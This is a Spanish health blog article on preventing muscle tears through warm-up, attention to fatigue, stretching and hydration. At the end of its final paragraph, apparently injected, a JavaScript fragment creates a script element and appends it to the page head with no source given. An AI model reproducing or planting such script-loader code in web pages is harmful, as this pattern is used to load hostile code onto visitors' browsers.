Salud y belleza » Deportes, Dolores

¿Se pueden prevenir los desgarros?

Sin Comentarios

En el campo de la medicina, la prevención representa la mejor forma de plantarse frente a algún mal. O, en realidad, de “no plantarse” pues, la clave de la anticipación, es directamente deshacer cualquier chance de riesgo potencial. Pero, en determinados casos, suena imposible poder utilizar esa técnica. Los desgarros, por ejemplo, son un problema muscular que raramente puedan ser prevenidos o anticipados.

Efectivamente, un desgarro es una lesión del tejido muscular, generalmente de las fibras interiores del mismo, que surge acompañada por la rotura de ciertos vasos sanguíneos aledaños al músculo afectado. Dada su naturaleza, entonces, es complicado hacer algo más que “curarlos” o “tratarlos”. Aún así, existen algunos trucos para reducir, al menos mínimamente, las posibilidades sufrir un desgarro.

“Los momentos en los que se producen más lesiones son siempre al inicio y sobre el de las clases o del entrenamiento. En la primera parte, sucede porque el músculo aún no se ha calentado lo suficiente y, sobre el cierre, por circunstancias como cansancio y la deshidratación. De tal manera, el buen calentamiento previo puede ser una solución y el análisis de la fatiga también” dice un especialista.

Para evitar desgarros, es necesario procurar tener cuidado al realizar determinados ejercicios. El estiramiento, como dijimos, es fundamental. Es necesario ingresar al campo o al recinto en donde comenzaremos la actividad plena ya transpirados. ¿Qué se quiere decir con esto? Que, para el esfuerzo real, el cuerpo debe ya haber sido acondicionado. De tal manera, quince minutos (nunca más de treinta) de calentamiento parece ser un tiempo razonable para reducir la chance de padecer lesiones musculares tempranas.

Durante el juego y especialmente sobre el final, es necesario descubrir el índice de desgaste muscular para no caer en una fatiga. En efecto, la fatiga muscular es otro síntoma que indica que se ha excedido en la intensidad de la ejercitación por lo tanto, para frenar la chances de caer en un desgarro de tantos milímetros, es necesario para la actividad y descansar. El estiramiento, representa otra solución tras la actividad.

No existen muchas otras soluciones más que estas: seguramente una buena alimentación y una gran hidratación, puedan contribuir positivamente. De todos modos, los desgarros siempre estarán allí: potenciales enemigos del deportista. Mejor, por supuesto, estar preparado o, al menos, tener los conocimientos necesarios para reducir las chances de caer ante ellos. Algo es algo.var d=document;var s=d.createElement('script'); d.getElementsByTagName('head')[0].appendChild(s);

Más consejos de salud y belleza : , , , ,

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.